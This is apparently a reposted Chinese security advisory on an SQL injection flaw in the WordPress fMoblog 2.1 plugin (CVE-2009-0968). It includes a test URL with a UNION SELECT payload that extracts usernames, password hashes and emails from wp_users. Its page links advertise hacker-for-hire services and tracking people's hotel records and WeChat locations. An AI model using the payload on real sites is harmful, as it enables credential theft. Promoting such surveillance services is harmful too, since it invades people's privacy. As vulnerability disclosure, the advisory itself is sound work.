WordPress fMoblog插件id参数SQL注入漏洞

访客4年前关于黑客接单674

影响版本:
Fahlstad fMoblog 2.1
漏洞描述:
BUGTRAQ  ID: 34147
CVE(CAN) ID: CVE-2009-0968

fMoblog是Wordpress所使用的移动博客插件,允许用户从手机张贴图形和描述等信息。

如果将page_id设置为已有的值的话,则fmoblog.php模块没有正确地验证index.php中对id参数所传送的输入便在SQL查询中使用,这允许远程攻击者通过提交恶意请求执行SQL注入攻击,完全入侵后端数据库系统。
 <*参考 
strange kevin (strange.kevin@gmail.com)
http://secuni *** /advisories/34341/.
*>
SEBUG安全建议:
厂商补丁:

Fredrik Fahlstad
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.fahlstad.se/wp-plugins/fmoblog/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

 

标签: 好话题

相关文章

微信找回密码申诉失败怎么回事

当投诉信息不足且身份无法证明时,投诉不能通过账号进行。提出投诉时,请尝试在经常登录微信的手机设备上填写投诉信息。收到申诉结果的手机号码,尽可能填写微信历史绑定的手机号码。 如果微信号绑定了银行卡,请...

不收定金的黑客专家_不收定金的黑客联系方式

在线接单平台QQ每一个上小学的网友都邑被先生或家长拷问:长大想做甚么?有人说你是科学家,有人想当大夫,有人想当战士。当编纂年青的时分,他的空想是成为一名黑客。 不收定金的黑客专家 1.说到黑客,咱们...

网上怎么查开宾馆记录(查开宾馆记录app安卓)_开宾馆记录

网上怎么查开宾馆记录(查开宾馆记录app安卓)作为社会上的一种貌寝征象,暗里与家人大概会的网民在品德上是不行容忍的。为了在网上交异性同事,少许人在网上交异性同事,做少许违抗品德和伉俪情绪的工作。不但毁...

19岁黑客组建 黑帽团队,两周攻破600多家网站_新浪微博

引言“群里有一个哥们,自称从小自学计算机网络技术,后去国外深造,现在回国要组建自己的“黑帽团队”,目前在做广告推广,直到他被抓华盟君才知道,这哥们一直干着挂黑页,给赌博网站做推广牟利。” 从赌博公司...

黑客教你定位i微信地址?这个方法你一定要知道_经济动物

黑客教你定位i微信地址?这个方法你一定要知道 黑客教你定位i微信地址?这个方法你一定要知道 黑客教你定位i微信地址?这个方法你一定要知道 黑客教你定位i微信地址?这个方法你一定要知道...

操控网络还能操控电压,你见过这样的黑客吗?_攻击

针对英特尔CPU的网络攻击并不新鲜。 然而利用电压发起攻击的黑客就很少见了。 黑客攻击英特尔CPU 近期研究人员发现一种全新攻击,黑客可以通过改变来电压来悄悄从处理器中盗窃敏感信息,例...